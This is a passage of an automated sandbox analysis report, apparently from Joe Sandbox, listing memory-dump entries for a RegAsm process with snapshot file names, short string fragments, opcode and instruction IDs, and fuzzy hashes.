                                              • Snapshot File: hcaresult_4_2_7ffd9b970000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7e489c83e6adf858c61130d87b187056ce592f56103632d64ec1ddcba1cb91e7
                                              • Instruction ID: 4e07824f37e258200786ae6455c06f45935e77f404895f910837d2199134cabe
                                              • Opcode Fuzzy Hash: 7e489c83e6adf858c61130d87b187056ce592f56103632d64ec1ddcba1cb91e7
                                              • Instruction Fuzzy Hash: C6B16F00F2FA5E1BF7A9A7E844B637912C2EFD9601F56427AD54DC32E3DD5CAA070281
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [S$ [S$([S$([S$8[S$@[S$H[S$`[S$h[S$p[S$p[S$p[S
                                              • API String ID: 0-465096162
                                              • Opcode ID: 1cef5be39f2088e95c4952fc18d51c9c8ad390822eb9962640332eba7e170139
                                              • Instruction ID: de661bfdd9435f1789a8797899239ce20093401c3e1dba5e8e64cb3a47949883
                                              • Opcode Fuzzy Hash: 1cef5be39f2088e95c4952fc18d51c9c8ad390822eb9962640332eba7e170139
                                              • Instruction Fuzzy Hash: 98D1A230A0994D8FDB99DF6CC465A747BE2FF9E304B1541BAE00DCB2E6CE25A8428750
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [S$ [S$ [S$([S$([S$([S$([S$p[S$p[S$p[S
                                              • API String ID: 0-4056241169
                                              • Opcode ID: 1d951fd2aa37e377010e6e2729ed9fa2df98a1a29cf26af5f875f9c352c892da
                                              • Instruction ID: e940b0ad81af8f968f51647e481c2c38f9a78761935ca06b0d3ad6dd4e5cf5d2
                                              • Opcode Fuzzy Hash: 1d951fd2aa37e377010e6e2729ed9fa2df98a1a29cf26af5f875f9c352c892da
                                              • Instruction Fuzzy Hash: 09E1B430B0990D8FDB98EF6CC465A747BE2FF9A354B1541B9E01EC72E6DE25A8428740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h8S$h8S$p7S$p8S$x8S$8S$8S
                                              • API String ID: 0-3391985836
                                              • Opcode ID: 6cebfeccd2decc56cd8ea669aaece8f03fb8a64243f3702454e05ad6174f1214
                                              • Instruction ID: 332e8754e4a091580ccfc6eca79de402b1f79615d393e66bbd43ef7fa23219f3
                                              • Opcode Fuzzy Hash: 6cebfeccd2decc56cd8ea669aaece8f03fb8a64243f3702454e05ad6174f1214
                                              • Instruction Fuzzy Hash: 0052C27060DB4D8FE768EB9884607B6B7E1FF99340F11466FE48DC72A2DE34A9428741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [S$ [S$([S$([S$p[S$p[S$p[S
                                              • API String ID: 0-2794958091
                                              • Opcode ID: 8673b46dc1b2c534b0ce8064750cc3055b2b56ef580f7353a84dcb0c109ec067
                                              • Instruction ID: 3d4699b4df8ca062c2d11de8833bc0f74ab60cf9ba0da4a34d50852678e4f3c3
                                              • Opcode Fuzzy Hash: 8673b46dc1b2c534b0ce8064750cc3055b2b56ef580f7353a84dcb0c109ec067
                                              • Instruction Fuzzy Hash: C7C1E531B0890D8FDB89EB6CD464AB47BE1FF99314B1541BAE04DCB1E7DE25AC428790
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [S$ [S$([S$([S$p[S$p[S$p[S
                                              • API String ID: 0-2794958091
                                              • Opcode ID: 9f62f7bf3b0d7dd5a60d1092fbc62f966d1125323341705314ef8847ee4972ab
                                              • Instruction ID: d70b3151218f21b864b746a62609e18451bd38464ff5995ab516be93c43094d2
                                              • Opcode Fuzzy Hash: 9f62f7bf3b0d7dd5a60d1092fbc62f966d1125323341705314ef8847ee4972ab
                                              • Instruction Fuzzy Hash: 82B18030B0990D8FDB99EF6CC465A747BE2FF9A304B1541B9E01DCB2A6CE35AC428750
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [S$ [S$([S$([S$p[S$p[S$p[S
                                              • API String ID: 0-2794958091
                                              • Opcode ID: 61cdb2615369294d0bd62ff5661833bc0fdbefed1b728113133c86018c7a01fc
                                              • Instruction ID: f36d0b9c21d848101ec75184d4f03fe68422ce6f925e17ec34bba5edb48e2938
                                              • Opcode Fuzzy Hash: 61cdb2615369294d0bd62ff5661833bc0fdbefed1b728113133c86018c7a01fc
                                              • Instruction Fuzzy Hash: 10B18030B0994D8FDB99EF6CC465A747BE2FF9A304B1541B9E01DCB2A6CE35AC428750
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H"S$X"S$!S$9S$9S$9S
                                              • API String ID: 0-3450427191
                                              • Opcode ID: 1e44621bcbc5f804176715e1b5e4ec12ddd98a740bff1b05c76835fb937bede1
                                              • Instruction ID: de01c919cfc83714ea382b2c167525d5ece849e38613fcfc977b886805baebfd
                                              • Opcode Fuzzy Hash: 1e44621bcbc5f804176715e1b5e4ec12ddd98a740bff1b05c76835fb937bede1
                                              • Instruction Fuzzy Hash: 5972A530A1994D4FDBA8EF58C462BA937E1FF9D300F1106BAD44DC72A6DE25E942C781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0:S$@:S$XV!T$`V!T$hV!T$pV!T
                                              • API String ID: 0-1175047475
                                              • Opcode ID: a86cdb5981b42eb2e70395e76cf513211e7fde345d3f944f7630e78527a041ec
                                              • Instruction ID: 27fff0a8e6b0ff121467fc83f09b85759e3d5071af20609f62ef0829e771e97a
                                              • Opcode Fuzzy Hash: a86cdb5981b42eb2e70395e76cf513211e7fde345d3f944f7630e78527a041ec
                                              • Instruction Fuzzy Hash: F7D11B30B1991D8FDB98FB6C8465A69B7E2FF9D700F5141A9D00EC72A6CE34ED428B41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (:S$0:S$8:S$@:S
                                              • API String ID: 0-3074433588
                                              • Opcode ID: c0be24c09a2b2afa717d76e7a56b9930bba7d5cf4e6112945bce112a2c34c84a
                                              • Instruction ID: bcfa30911b0ff97e52dd8b5812986fb22c035e911a43d4496a94b5469fd6ca55
                                              • Opcode Fuzzy Hash: c0be24c09a2b2afa717d76e7a56b9930bba7d5cf4e6112945bce112a2c34c84a
                                              • Instruction Fuzzy Hash: 08F1EF3071990D8FDB98FF68D455EA977E1EFA8340B5141A9E40DC72A6DE35EC41CB80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @V!T$HV!T$PV!T$`'S
                                              • API String ID: 0-2406540014
                                              • Opcode ID: f272d63b50a71f0f71120b772b51380bf480def343cf07613c23c941fa5cf171
                                              • Instruction ID: 68089273d3c16693cf875baeaa4ce2078819686c2b50db7dbcec30fc32095848
                                              • Opcode Fuzzy Hash: f272d63b50a71f0f71120b772b51380bf480def343cf07613c23c941fa5cf171
                                              • Instruction Fuzzy Hash: B6A1D230719A498FE7A8EB6CC4A46B577E2FF8D300B1505BAD04DC72A6CE29E942C740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 7S$(7S$07S$87S
                                              • API String ID: 0-2082053501
                                              • Opcode ID: f95eb67c0738641c20761baf254564ccf7ba0a6980d983c250ad48fcb643240d
                                              • Instruction ID: 07da9c256a4cbd2c9dac5878f3d11025b13a491becdc2505eea0670745dd407a
                                              • Opcode Fuzzy Hash: f95eb67c0738641c20761baf254564ccf7ba0a6980d983c250ad48fcb643240d
                                              • Instruction Fuzzy Hash: 67410330B0DA0D4FEB68FB68941567577D0EF8E354F11037AE48EC31A6DE29A9428345
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 89S$@9S$H9S$P9S
                                              • API String ID: 0-4276842295
                                              • Opcode ID: 209d55c997bbfb292c8ef7190dccae113a9b636a502de624597e0e89db880632
                                              • Instruction ID: e3282c9fc76e55e113085521fae2ef434deb5a2faeca801f49845cde05ff440e
                                              • Opcode Fuzzy Hash: 209d55c997bbfb292c8ef7190dccae113a9b636a502de624597e0e89db880632
                                              • Instruction Fuzzy Hash: E241EDABB1C43249E21A73ADB4254FC2B44DFC923970886B7C1A9CF1D3D984298F42F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H"S$9S$9S
                                              • API String ID: 0-3814768223
                                              • Opcode ID: b9b71d8653c69369100f885072e43255f395851b6f68f2550a298195467af3b0
                                              • Instruction ID: 2f5f698cc914f75573619db430cad9e5b8bd89d30257f669b4596a1f46531427
                                              • Opcode Fuzzy Hash: b9b71d8653c69369100f885072e43255f395851b6f68f2550a298195467af3b0
                                              • Instruction Fuzzy Hash: 8352803061994D8FDBA8EF58C465BA937E1FF99304F1106AAE44DC72A6CE35E942C780
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S$(9S$09S
                                              • API String ID: 0-1391290778
                                              • Opcode ID: a8fae0caced6a32569e92006f4d8b1fa4f33e3ec2efc61a4260b247402534be0
                                              • Instruction ID: ad3739fb6a669eea0fd947d02e06bd6b7fe824343bf99a9483475fd30df288c4
                                              • Opcode Fuzzy Hash: a8fae0caced6a32569e92006f4d8b1fa4f33e3ec2efc61a4260b247402534be0
                                              • Instruction Fuzzy Hash: 4922AE30B19A4D4FEBA8DB6884657B977E2FF99300F15427ED44EC32A2CE25ED428741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 7S$(7S$07S
                                              • API String ID: 0-2425426547
                                              • Opcode ID: f8cc622e2d7cfd02369d737990149b0e24da752dc789502cec9a9fa4bcbc26a1
                                              • Instruction ID: c91744c9cd3b69be7fbbd416c6cc25d7e5d97649524c08869c74f9f055feb0d7
                                              • Opcode Fuzzy Hash: f8cc622e2d7cfd02369d737990149b0e24da752dc789502cec9a9fa4bcbc26a1
                                              • Instruction Fuzzy Hash: 5041173060EA8E4FEB95FB6858246757BE0EF9B314B1602BBD48DC71A3DD19AD018351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #'$3%$;&
                                              • API String ID: 0-1264053810
                                              • Opcode ID: 369dc502053b531c914332b89d8c717e17f401443acd08cdb46af01b337b8683
                                              • Instruction ID: 7d8a3845c4cdcddb1612c9fd10b50e196334ee8cddfc98a13de83aff79be0727
                                              • Opcode Fuzzy Hash: 369dc502053b531c914332b89d8c717e17f401443acd08cdb46af01b337b8683
                                              • Instruction Fuzzy Hash: 48112E30B1991C9FDF95EB9CE494AAC77F1FF9C311F11026AE00ED32A6CA34A8418B44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (V!T$0V!T
                                              • API String ID: 0-4269676020
                                              • Opcode ID: f1bad7fb0149e5a401ca8261a49080cce197a8a4db58b3636ac21e22ea154e36
                                              • Instruction ID: 592422e0ff72eca02cb57f14566ff04834c8763f6176cd11731a275862c63151
                                              • Opcode Fuzzy Hash: f1bad7fb0149e5a401ca8261a49080cce197a8a4db58b3636ac21e22ea154e36
                                              • Instruction Fuzzy Hash: 03328130B19A1D4FEBA8EB68946576877E2FF9D300F1542BED00DC72A6DE34AD418B41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (!S$0'S
                                              • API String ID: 0-1666305145
                                              • Opcode ID: 73a96fbe8f61d623dd0fd4295d3efd5c753ceca736f8eef86e9dbf4f92724146
                                              • Instruction ID: 27b802d9703520c6562557f3a2bb16dadd6e3a3ee32b2f81a25c3baafec9db73
                                              • Opcode Fuzzy Hash: 73a96fbe8f61d623dd0fd4295d3efd5c753ceca736f8eef86e9dbf4f92724146
                                              • Instruction Fuzzy Hash: 6912EA71A0E68E4FEB75875448265A43BE0EFDE311F0707FBD48DCB8B2D9186A0A8751
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: P"S$!S
                                              • API String ID: 0-3604831306
                                              • Opcode ID: cf000096231dfb61b229de2e6e89705e3ed321ac0002b7d936af22ca6006e65b
                                              • Instruction ID: a067484d6271984a9c18e44c79017ae03faa7ef1284d881e5f98285d9c226f38
                                              • Opcode Fuzzy Hash: cf000096231dfb61b229de2e6e89705e3ed321ac0002b7d936af22ca6006e65b
                                              • Instruction Fuzzy Hash: 9B02A730A0EA4D4FDBB9EB688865BA877E1EF9D300F1541F9D04DC72A2DE34AD468741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0:S$@:S
                                              • API String ID: 0-1670229710
                                              • Opcode ID: 993ce17a85d8e2558452234ae21bcc6a0e98af6c43b8ba70eab1a76095811f4f
                                              • Instruction ID: a68e363c3e164dba20ba62519f49c1eba871bbe8acdf71bd0bb969675fd929a8
                                              • Opcode Fuzzy Hash: 993ce17a85d8e2558452234ae21bcc6a0e98af6c43b8ba70eab1a76095811f4f
                                              • Instruction Fuzzy Hash: 4BB19571B19A0D4FEBACFBAC9465AB973D1EF9D700F11017AE04DC32A6DE24AC428741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ]I_L$^I_L
                                              • API String ID: 0-3696243514
                                              • Opcode ID: 2a6daa245b500e9249ebd8414f47b8d5d019e9345b953a42f9ef9755575fef60
                                              • Instruction ID: af86904f8c309dc0cf401096cf9d95193abab096fb23d041587251f6661122b4
                                              • Opcode Fuzzy Hash: 2a6daa245b500e9249ebd8414f47b8d5d019e9345b953a42f9ef9755575fef60
                                              • Instruction Fuzzy Hash: D2917A22B1DA4A4BE36CAB6CA8695B577C1EFD9360F0443BBE04DC31D7ED24B8034681
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ]I_L$^I_L
                                              • API String ID: 0-3696243514
                                              • Opcode ID: 447252879f6cc31d43e252385a64e042bf97790a30ed476edb623f197ee15aac
                                              • Instruction ID: 092d810cdfc59a3c8fa799c31a06ebdcb3935c8ebdca7093dcddb0e47dd8e5c3
                                              • Opcode Fuzzy Hash: 447252879f6cc31d43e252385a64e042bf97790a30ed476edb623f197ee15aac
                                              • Instruction Fuzzy Hash: AB714922B1DA4A4BE75CAB6CA82A5B573D1EF99354F0442BFD04EC32D7ED25B8024781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ]I_L$^I_L
                                              • API String ID: 0-3696243514
                                              • Opcode ID: f9ef204303916015c0dcf7b83498beb550b926dcaed94df511942308f5e95ca5
                                              • Instruction ID: d4e68bb9ae5560c1cef8281aed2818fb93887922b29b659dc973345f6d719dd2
                                              • Opcode Fuzzy Hash: f9ef204303916015c0dcf7b83498beb550b926dcaed94df511942308f5e95ca5
                                              • Instruction Fuzzy Hash: B0613922B1CE4A4BE76CAB5CA8296B573D1EFD8354F0542BBD00DC32D7DE25B8464682
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: _2KCX$'
                                              • API String ID: 0-1480843901
                                              • Opcode ID: 122e6abca80ec077e020ad84ae761171f4eaa24a725297a3ec25e6b211d2becd
                                              • Instruction ID: cae6da76be632a3c75c186c9e7bdf87e2fd0fde91cc04d679d571c503d779d7c
                                              • Opcode Fuzzy Hash: 122e6abca80ec077e020ad84ae761171f4eaa24a725297a3ec25e6b211d2becd
                                              • Instruction Fuzzy Hash: 0D41F13460868E8FDB59FB68E865AF97790FF44314F0046ABE059CB197DB34A982C780
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8V!T
                                              • API String ID: 0-2624839006
                                              • Opcode ID: 923cb2021e1211f8bc50fb0e31de51d504e6660a949f60b2ab1147f0b59a1b4a
                                              • Instruction ID: 5f2da5277f7ba172c2ee5669820e4ee3c6af8e47acc51a38bab153b11138bb92
                                              • Opcode Fuzzy Hash: 923cb2021e1211f8bc50fb0e31de51d504e6660a949f60b2ab1147f0b59a1b4a
                                              • Instruction Fuzzy Hash: 4F127431B1990D8FDB98EF58C4A5AE977E1FFAC340B550279E40DC72A6DE24ED428780
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h:S
                                              • API String ID: 0-1575203915
                                              • Opcode ID: 6d03159c35b3c83daa6fd17456bb4fdd7fc272ae41123406d7deacac6de226be
                                              • Instruction ID: 1a695ccd03436d32d44667180de712c8fc2a866d341290aab8a8c381fefeb3c6
                                              • Opcode Fuzzy Hash: 6d03159c35b3c83daa6fd17456bb4fdd7fc272ae41123406d7deacac6de226be
                                              • Instruction Fuzzy Hash: 7B023030719A4D8FDB98EF5CC494AA973E2FF98304B2545A9E41DC72A6CE35EC42CB40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 2ed5144d14990a284ecc46e7e4b6299e5708f411411013e05717b70ad5a11bf6
                                              • Instruction ID: 48777bd4570276202d35eeb3cfa0ce9ecdd8c8c175816ae5953088cbf60c6991
                                              • Opcode Fuzzy Hash: 2ed5144d14990a284ecc46e7e4b6299e5708f411411013e05717b70ad5a11bf6
                                              • Instruction Fuzzy Hash: 3CE10230A19A0D8FDB5CDF58D491575B3E1FF99300B2446BAD94AC72AADA34EC43CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: P"S
                                              • API String ID: 0-3847941576
                                              • Opcode ID: 050de083b9619ca01b9e570b46cbf4d6c637b43e1d44c17ca37444ec8dbc00d5
                                              • Instruction ID: f237775f70a156dd173d13c37887cf26f68de4924e2c3f2dc245914bf8036364
                                              • Opcode Fuzzy Hash: 050de083b9619ca01b9e570b46cbf4d6c637b43e1d44c17ca37444ec8dbc00d5
                                              • Instruction Fuzzy Hash: DDD11A31B0EB8D4FD77AEB6888256643BE1EF9E300F1605BAD44DC72A3DD25AD468341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: 1eb3ec9272aeec0593bd49bcf0a4c37a9b22fbb6099e64046d72c28661011aa0
                                              • Instruction ID: f7066a6d13bda47234b08fdffa00b25e7acfbd32f02bb1f5bc1a01ea471c5cfb
                                              • Opcode Fuzzy Hash: 1eb3ec9272aeec0593bd49bcf0a4c37a9b22fbb6099e64046d72c28661011aa0
                                              • Instruction Fuzzy Hash: F6D1C560B0EA4D4FE7699BA884617B877D1FF99304F1503BED48EC71E3DE28A9468701
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: 654d3713f7571f1969380763a44cf3d82ebaf51848d771117ccd1cab171fd427
                                              • Instruction ID: 15c34e25c87e05d218dc1cc48358b1f1aa1a56145c3f58057db6d45b19c386f0
                                              • Opcode Fuzzy Hash: 654d3713f7571f1969380763a44cf3d82ebaf51848d771117ccd1cab171fd427
                                              • Instruction Fuzzy Hash: C5C18E30B19A1D4FEB68DB5C84617A977E1FF9D300F2542BED44EC72A2CE28AD468741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: 80904a9dbfdab1c527b8821d3d21cbee89d4ae3970255be55a6e2fe53c66eeca
                                              • Instruction ID: d4efdec8b82d2e76b3c84bb4798b58857dc65196f370854d46732d67c889c44f
                                              • Opcode Fuzzy Hash: 80904a9dbfdab1c527b8821d3d21cbee89d4ae3970255be55a6e2fe53c66eeca
                                              • Instruction Fuzzy Hash: CBB18320B19A4E4FE7689BA8846177977D1FF99300F5543BED48EC72E3CE28AD458740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: 5f32b02eea0b7131926299db6ede46e39346caad36e4108a1005f573e0da627a
                                              • Instruction ID: f32619d7246b26f648537ebfc9c0ea3ff1e0889ddc647c6b7ea01d4a223ce5a0
                                              • Opcode Fuzzy Hash: 5f32b02eea0b7131926299db6ede46e39346caad36e4108a1005f573e0da627a
                                              • Instruction Fuzzy Hash: 70A17F20B19A0E4FEBA89B98846177977D1FF9D300F5542BED44EC72E3CE29E9468740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: 194fe425d84ffae13d604075df710e4082725dab6d760166d23e3175e7f58bc7
